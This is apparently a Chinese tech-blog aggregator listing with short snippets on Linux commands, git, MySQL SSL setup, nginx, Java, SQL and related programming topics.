    进入到证书存放目录,批量删除.pem证书警告:确保已经进入到证书存放目录find.-typef-iname\*.pem-delete查看是否安装OpenSSLopensslversion没有则安装yuminstallopensslopenssl-devel开启SSL编辑/etc/my.cnf文件(没有的话就创建,但是要注意,在/etc/my.cnf.d/server.cnf配置了datadir的,
  • 【从浅识到熟知Linux】Linux发展史 Jammingpro 从浅学到熟知Linuxlinux运维服务器
    归属专栏:从浅学到熟知Linux个人主页:Jammingpro每日努力一点点,技术变化看得见文章前言:本篇文章记录Linux发展的历史,因在介绍Linux过程中涉及的其他操作系统及人物,本文对相关内容也有所介绍。文章目录Unix发展史Linux发展史开源Linux官网企业应用情况发行版本在学习Linux前,我们可能都会问Linux从哪里来?它是如何发展的。但在介绍Linux之前,需要先介绍一下Un
  • linux 发展史 种树的猴子 内核java操作系统linux大数据
    linux发展史说明此前对linux认识模糊一知半解,近期通过学习将自己对于linux的发展总结一下方便大家日后的学习。那Linux是目前一款非常火热的开源操作系统,可是linux是什么时候出现的,又是因为什么样的原因被开发出来的呢。以下将对linux的发展历程进行详细的讲解。目录一、Linux发展背景二、UINIX的诞生三、UNIX的重要分支-BSD的诞生四、Minix的诞生五、GNU与Free
  • Linux sh命令 fengyehongWorld Linuxlinux
    目录一.基本语法二.选项2.1-c字符串中读取内容,并执行2.1.1基本用法2.1.2获取当前目录下失效的超链接2.2-x每个命令执行之前,将其打印出来2.3结合Here文档使用一.基本语法⏹Linux和Unix系统中用于执行shell脚本或运行命令的命令。sh[选项][脚本文件][参数...]⏹选项-c:从字符串中读取内容,并执行。-x:在每个命令执行之前,将其打印出来。-s:从标准流中读取内容
  • Linux vi常用命令 fengyehongWorld Linuxlinux
    参考资料viコマンド(vimコマンド)リファレンス目录一.保存系命令二.删除系命令三.移动系命令四.复制粘贴系命令一.保存系命令⏹保存并退出:wq⏹强制保存并退出:wq!⏹退出(文件未编辑):q⏹强制退出(忽略已编辑内容):q!⏹另存为:w新文件名二.删除系命令⏹删除当前行dd⏹清空整个文档gg:移动到文档顶部dG:删除到最后一行ggdG三.移动系命令⏹移动到文档顶部gg⏹移动到文档底部#方式1G
  • Linux查看服务器日志 TPBoreas 运维linux运维
    一、tail这个是我最常用的一种查看方式用法如下:tail-n10test.log查询日志尾部最后10行的日志;tail-n+10test.log查询10行之后的所有日志;tail-fn10test.log循环实时查看最后1000行记录(最常用的)一般还会配合着grep用,(实时抓包)例如:tail-fn1000test.log|grep'关键字'(动态抓包)tail-fn1000test.log
  • 笋丁网页自动回复机器人V3.0.0免授权版源码 希希分享 软希网58soho_cn源码资源笋丁网页自动回复机器人
    笋丁网页机器人一款可设置自动回复,默认消息,调用自定义api接口的网页机器人。此程序后端语言使用Golang,内存占用最高不超过30MB,1H1G服务器流畅运行。仅支持Linux服务器部署,不支持虚拟主机,请悉知!使用自定义api功能需要有一定的建站基础。源码下载:https://download.csdn.net/download/m0_66047725/89754250更多资源下载:关注我。安
  • Linux CTF逆向入门 蚁景网络安全 linux运维CTF
    1.ELF格式我们先来看看ELF文件头,如果想详细了解,可以查看ELF的manpage文档。关于ELF更详细的说明:e_shoff:节头表的文件偏移量(字节)。如果文件没有节头表,则此成员值为零。sh_offset:表示了该section(节)离开文件头部位置的距离+-------------------+|ELFheader|---++--------->+-------------------
  • NPM私库搭建-verdaccio(Linux) Beam007 npmlinux前端
    1、安装nodelinux服务器安装nodea)、官网下载所需的node版本https://nodejs.org/dist/v14.21.0/b)、解压安装包若下载的是xxx.tar.xz文件,解压命令为tar-xvfxxx.tar.xzc)、修改环境变量修改:/etc/profile文件#SETPATHFORNODEJSexportNODE_HOME=NODEJS解压安装的路径exportPAT
  • C++常见知识掌握 nfgo c++开发语言
    1.Linux软件开发、调试与维护内核与系统结构Linux内核是操作系统的核心,负责管理硬件资源,提供系统服务,它是系统软件与硬件之间的桥梁。主要组成部分包括:进程管理:内核通过调度器分配CPU时间给各个进程,实现进程的创建、调度、终止等操作。使用进程描述符(task_struct)来存储进程信息,包括状态(就绪、运行、阻塞等)、优先级、内存映射等。内存管理:包括物理内存和虚拟内存管理。通过页表映
  • linux脚本sed替换变量,sed 命令中替换值为shell变量 诺坎普之约 linux脚本sed替换变量
    文章目录sed命令中替换值为shell变量替换基本语法sed中替换使用shell变量总结参考文档sed命令中替换值为shell变量替换基本语法大家都是sed有很多用法,最多就应该是替换一些值了。让我们先回忆sed的替换语法。在sed进行替换的时候sed-i's/old/new/g'1.txtecho"hellooldfrank"|sed's/old/new/g'结果如下:hellonewfrank
  • RK3229_Android9.0_Box 4G模块EC200A调试 suifen_ 网络
    0、kernel修改这部分完全可以参考Linux的移植:RK3588EC200A-CN【4G模块】调试_rkec200a-cn-CSDN博客1、修改device/rockchip/rk322xdiff--gita/device.mkb/device.mkindexec6bfaa..e7c32d1100755---a/device.mk+++b/device.mk@@-105,6+105,8@@en
  • linux 安装Sublime Text 3 hhyiyuanyu Python学习linuxsublimetext
    方法/步骤打开官网http://www.sublimetext.com/3,选择64位进行下载执行命令wgethttps://download.sublimetext.com/sublime_text_3_build_3126_x64.tar.bz2进行下载3、下载完成进行解压,执行tar-xvvfsublime_text_3_build_3126_x64.tar.bz解压4、解压完成以后,移动到
  • KVM虚拟机源代码分析【转】 xidianjiapei001 #虚拟化技术
    1.KVM结构及工作原理1.1KVM结构KVM基本结构有两部分组成。一个是KVMDriver,已经成为Linux内核的一个模块。负责虚拟机的创建,虚拟内存的分配,虚拟CPU寄存器的读写以及虚拟CPU的运行等。另外一个是稍微修改过的Qemu,用于模拟PC硬件的用户空间组件,提供I/O设备模型以及访问外设的途径。KVM基本结构如图1所示。其中KVM加入到标准的Linux内核中,被组织成Linux中标准
  • 史上最全git命令,git回滚,git命令大全 騒周 其他git
    git命令大全一、Git整体理解二、由暂存区本地仓库三、由本地仓->远程仓库四、冲突处理五、Git分支操作六、bug的分支七、feature分支八、暂存的使用九、远程仓的操作十、标签的使用十一、Git配置全局信息十二、Linux的一些简单操作和一些符号的解释十三、符号解释十四、显示安装详细信息十五、gitconfig十六、Gitclone十七、Gitinit十八、gitstatus十九、gitre
  • 【显示 后台运行 & 的命令】 晨春计 debuglinux服务器运维
    目录背景步骤详解示例背景当你在Linuxshell中使用&符号将一个命令放到后台运行时,你可以使用jobs命令来查看这些后台进程的状态。但是,jobs命令并不会直接显示进程的PID(进程ID)。它会显示一个作业列表,其中包括每个作业的状态和一个作业标识符(通常是百分号%后面跟着一个数字),但不会直接显示PID。获取后台进程的PID步骤:1、使用jobs命令查看后台作业。2、使用ps命令配合grep
  • Android shell 常用 debug 命令 晨春计 Audiodebugandroidlinux
    目录1、查看版本2、am命令3、pm命令4、dumpsys命令5、sed命令6、log定位查看APK进程号7、log定位使用场景1、查看版本1.1、Android串口终端执行getpropro.build.version.release#获取Android版本uname-a#查看linux内核版本信息uname-r#单独查看内核版本1.2、linux服务器执行lsb_release-a#查看Lin
  • 【nginx】ngx_http_proxy_connect_module 正向代理 等风来不如迎风去 网络服务入门与实战nginxhttp运维
    50.65无法访问服务器,(403错误)50.196可以访问服务器。那么,配置65通过196访问。需要一个nginx作为代理【nginx】搭配okhttp配置反向代理发送原生的nginx是不支持okhttp的CONNECT请求的。大神竟然给出了一个java工程GINX编译ngx_http_proxy_connect_module及做正向代理是linux构建的。是windows构建的:编译Windo
  • linux下好用的任务管理器htop WittXie Linuxlinux服务器运维
    给大家推荐个好用的任务管理器htop,简直好用的不得了。完虐top。不解释了,看文章!!!在Linux系统中,top命令用来显示系统中正在运行的进程的实时状态,它显示了一些非常有用的信息,比如CPU利用情况、内存消耗情况,以及每个进程情况等。但是,你知道吗?还有另外一个命令行工具'htop',它与传统的top命令功能一样,但它有更加强大的功能及能显示更多的信息。这篇文章,我们会用实例来讨论这个'h
  • Linux下使用U盘 WittXie Linuxlinux运维服务器
    第一步:插入U盘,如果能够识别出U盘,则会打印出一些信息;第二步:查看U盘系统分配给U盘的设备名;输入如下命令进行查看:fdisk-l/dev/sda如果打印出如下信息:Disk/dev/sda:4233MB,4233101312bytes165heads,34sectors/track,1473cylindersUnits=cylindersof5610*512=2872320bytesDevi
  • [星球大战]阿纳金的背叛 comsci
          本来杰迪圣殿的长老是不同意让阿纳金接受训练的.........     但是由于政治原因,长老会妥协了...这给邪恶的力量带来了机会     所以......现代的地球联邦接受了这个教训...绝对不让某些年轻人进入学院    
  • 看懂它,你就可以任性的玩耍了! aijuans JavaScript
              javascript作为前端开发的标配技能,如果不掌握好它的三大特点:1.原型 2.作用域 3. 闭包 ,又怎么可以说你学好了这门语言呢?如果标配的技能都没有撑握好,怎么可以任性的玩耍呢?怎么验证自己学好了以上三个基本点呢,我找到一段不错的代码,稍加改动,如果能够读懂它,那么你就可以任性了。 function jClass(b
  • Java常用工具包 Jodd Kai_Ge javajodd
    Jodd 是一个开源的 Java 工具集, 包含一些实用的工具类和小型框架。简单,却很强大! 写道 Jodd = Tools + IoC + MVC + DB + AOP + TX + JSON + HTML < 1.5 Mb Jodd 被分成众多模块,按需选择,其中 工具类模块有: jodd-core    &nb
  • SpringMvc下载 120153216 springMVC
    @RequestMapping(value = WebUrlConstant.DOWNLOAD) public void download(HttpServletRequest request,HttpServletResponse response,String fileName) { OutputStream os = null; InputStream is = null;
  • Python 标准异常总结 2002wmj python
    Python标准异常总结 AssertionError 断言语句(assert)失败 AttributeError 尝试访问未知的对象属性 EOFError 用户输入文件末尾标志EOF(Ctrl+d) FloatingPointError 浮点计算错误 GeneratorExit generator.close()方法被调用的时候 ImportError 导入模块失
  • SQL函数返回临时表结构的数据用于查询 357029540 SQL Server
    这两天在做一个查询的SQL,这个SQL的一个条件是通过游标实现另外两张表查询出一个多条数据,这些数据都是INT类型,然后用IN条件进行查询,并且查询这两张表需要通过外部传入参数才能查询出所需数据,于是想到了用SQL函数返回值,并且也这样做了,由于是返回多条数据,所以把查询出来的INT类型值都拼接为了字符串,这时就遇到问题了,在查询SQL中因为条件是INT值,SQL函数的CAST和CONVERST都
  • java 时间格式化 | 比较大小| 时区 个人笔记 7454103 javaeclipsetomcatcMyEclipse
    个人总结! 不当之处多多包含! 引用 1.0 如何设置 tomcat 的时区:          位置:(catalina.bat---JAVA_OPTS  下面加上)          set JAVA_OPT
  • 时间获取Clander的用法 adminjun Clander时间
    /**    * 得到几天前的时间    * @param d    * @param day    * @return    */   public static Date getDateBefore(Date d,int day){    Calend
  • JVM初探与设置 aijuans java
    JVM是Java Virtual Machine(Java虚拟机)的缩写,JVM是一种用于计算设备的规范,它是一个虚构出来的计算机,是通过在实际的计算机上仿真模拟各种计算机功能来实现的。Java虚拟机包括一套字节码指令集、一组寄存器、一个栈、一个垃圾回收堆和一个存储方法域。 JVM屏蔽了与具体操作系统平台相关的信息,使Java程序只需生成在Java虚拟机上运行的目标代码(字节码),就可以在多种平台
  • SQL中ON和WHERE的区别 avords
    SQL中ON和WHERE的区别   数据库在通过连接两张或多张表来返回记录时,都会生成一张中间的临时表,然后再将这张临时表返回给用户。   www.2cto.com   在使用left jion时,on和where条件的区别如下:  1、 on条件是在生成临时表时使用的条件,它不管on中的条件是否为真,都会返回左边表中的记录。 
  • 说说自信 houxinyou 工作生活
    自信的来源分为两种,一种是源于实力,一种源于头脑.实力是一个综合的评定,有自身的能力,能利用的资源等.比如我想去月亮上,要身体素质过硬,还要有飞船等等一系列的东西.这些都属于实力的一部分.而头脑不同,只要你头脑够简单就可以了!同样要上月亮上,你想,我一跳,1米,我多跳几下,跳个几年,应该就到了!什么?你说我会往下掉?你笨呀你!找个东西踩一下不就行了吗?     无论工作还
  • WEBLOGIC事务超时设置 bijian1013 weblogicjta事务超时
            系统中统计数据,由于调用统计过程,执行时间超过了weblogic设置的时间,提示如下错误: 统计数据出错! 原因:The transaction is no longer active - status: 'Rolling Back. [Reason=weblogic.transaction.internal
  • 两年已过去,再看该如何快速融入新团队 bingyingao java互联网融入架构新团队
    偶得的空闲,翻到了两年前的帖子 该如何快速融入一个新团队,有所感触,就记下来,为下一个两年后的今天做参考。     时隔两年半之后的今天,再来看当初的这个博客,别有一番滋味。而我已经于今年三月份离开了当初所在的团队,加入另外的一个项目组,2011年的这篇博客之后的时光,我很好的融入了那个团队,而直到现在和同事们关系都特别好。大家在短短一年半的时间离一起经历了一
  • 【Spark七十七】Spark分析Nginx和Apache的access.log bit1129 apache
    Spark分析Nginx和Apache的access.log,第一个问题是要对Nginx和Apache的access.log文件进行按行解析,按行解析就的方法是正则表达式:   Nginx的access.log解析正则表达式   val PATTERN = """([^ ]*) ([^ ]*) ([^ ]*) (\\[.*\\]) (\&q
  • Erlang patch bookjovi erlang
    Totally five patchs committed to erlang otp, just small patchs. IMO, erlang really is a interesting programming language, I really like its concurrency feature. but the functional programming style
  • log4j日志路径中加入日期 bro_feng javalog4j
    要用log4j使用记录日志,日志路径有每日的日期,文件大小5M新增文件。 实现方式 log4j: <appender name="serviceLog" class="org.apache.log4j.RollingFileAppender"> <param name="Encoding" v
  • 读《研磨设计模式》-代码笔记-桥接模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /** * 个人觉得关于桥接模式的例子,蜡笔和毛笔这个例子是最贴切的:http://www.cnblogs.com/zhenyulu/articles/67016.html * 笔和颜色是可分离的,蜡笔把两者耦合在一起了:一支蜡笔只有一种
  • windows7下SVN和Eclipse插件安装 chenyu19891124 eclipse插件
    今天花了一天时间弄SVN和Eclipse插件的安装,今天弄好了。svn插件和Eclipse整合有两种方式,一种是直接下载插件包,二种是通过Eclipse在线更新。由于之前Eclipse版本和svn插件版本有差别,始终是没装上。最后在网上找到了适合的版本。所用的环境系统:windows7JDK:1.7svn插件包版本:1.8.16Eclipse:3.7.2工具下载地址:Eclipse下在地址:htt
  • [转帖]工作流引擎设计思路 comsci 设计模式工作应用服务器workflow企业应用
    作为国内的同行,我非常希望在流程设计方面和大家交流,刚发现篇好文(那么好的文章,现在才发现,可惜),关于流程设计的一些原理,个人觉得本文站得高,看得远,比俺的文章有深度,转载如下 ================================================================================= 自开博以来不断有朋友来探讨工作流引擎该如何
  • Linux 查看内存,CPU及硬盘大小的方法 daizj linuxcpu内存硬盘大小
    一、查看CPU信息的命令 [root@R4 ~]# cat /proc/cpuinfo |grep "model name" && cat /proc/cpuinfo |grep "physical id" model name : Intel(R) Xeon(R) CPU X5450 @ 3.00GHz model name :
  • linux 踢出在线用户 dongwei_6688 linux
    两个步骤: 1.用w命令找到要踢出的用户,比如下面:   [root@localhost ~]# w 18:16:55 up 39 days, 8:27, 3 users, load average: 0.03, 0.03, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
  • 放手吧,就像不曾拥有过一样 dcj3sjt126com
    内容提要: 静悠悠编著的《放手吧就像不曾拥有过一样》集结“全球华语世界最舒缓心灵”的精华故事,触碰生命最深层次的感动,献给全世界亿万读者。《放手吧就像不曾拥有过一样》的作者衷心地祝愿每一位读者都给自己一个重新出发的理由,将那些令你痛苦的、扛起的、背负的,一并都放下吧!把憔悴的面容换做一种清淡的微笑,把沉重的步伐调节成春天五线谱上的音符,让自己踏着轻快的节奏,在人生的海面上悠然漂荡,享受宁静与
  • php二进制安全的含义 dcj3sjt126com PHP
    PHP里,有string的概念。 string里,每个字符的大小为byte(与PHP相比,Java的每个字符为Character,是UTF8字符,C语言的每个字符可以在编译时选择)。 byte里,有ASCII代码的字符,例如ABC,123,abc,也有一些特殊字符,例如回车,退格之类的。 特殊字符很多是不能显示的。或者说,他们的显示方式没有标准,例如编码65到哪儿都是字母A,编码97到哪儿都是字符
  • Linux下禁用T440s,X240的一体化触摸板(touchpad) gashero linuxThinkPad触摸板
    自打1月买了Thinkpad T440s就一直很火大,其中最让人恼火的莫过于触摸板。   Thinkpad的经典就包括用了小红点(TrackPoint)。但是小红点只能定位,还是需要鼠标的左右键的。但是自打T440s等开始启用了一体化触摸板,不再有实体的按键了。问题是要是好用也行。   实际使用中,触摸板一堆问题,比如定位有抖动,以及按键时会有飘逸。这就导致了单击经常就
  • graph_dfs hcx2013 Graph
    package edu.xidian.graph; class MyStack { private final int SIZE = 20; private int[] st; private int top; public MyStack() { st = new int[SIZE]; top = -1; } public void push(i
  • Spring4.1新特性——Spring核心部分及其他 jinnianshilongnian spring 4.1
    目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
  • 配置HiveServer2的安全策略之自定义用户名密码验证 liyonghui160com
        具体从网上看   http://doc.mapr.com/display/MapR/Using+HiveServer2#UsingHiveServer2-ConfiguringCustomAuthentication   LDAP Authentication using OpenLDAP Setting
  • 一位30多的程序员生涯经验总结 pda158 编程工作生活咨询
    1.客户在接触到产品之后,才会真正明白自己的需求。   这是我在我的第一份工作上面学来的。只有当我们给客户展示产品的时候,他们才会意识到哪些是必须的。给出一个功能性原型设计远远比一张长长的文字表格要好。 2.只要有充足的时间,所有安全防御系统都将失败。   安全防御现如今是全世界都在关注的大课题、大挑战。我们必须时时刻刻积极完善它,因为黑客只要有一次成功,就可以彻底打败你。   3.
  • 分布式web服务架构的演变 自由的奴隶 linuxWeb应用服务器互联网
    最开始,由于某些想法,于是在互联网上搭建了一个网站,这个时候甚至有可能主机都是租借的,但由于这篇文章我们只关注架构的演变历程,因此就假设这个时候已经是托管了一台主机,并且有一定的带宽了,这个时候由于网站具备了一定的特色,吸引了部分人访问,逐渐你发现系统的压力越来越高,响应速度越来越慢,而这个时候比较明显的是数据库和应用互相影响,应用出问题了,数据库也很容易出现问题,而数据库出问题的时候,应用也容易
  • 初探Druid连接池之二——慢SQL日志记录 xingsan_zhang 日志连接池druid慢SQL
    由于工作原因,这里先不说连接数据库部分的配置,后面会补上,直接进入慢SQL日志记录。   1.applicationContext.xml中增加如下配置: <bean abstract="true" id="mysql_database" class="com.alibaba.druid.pool.DruidDataSourc
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他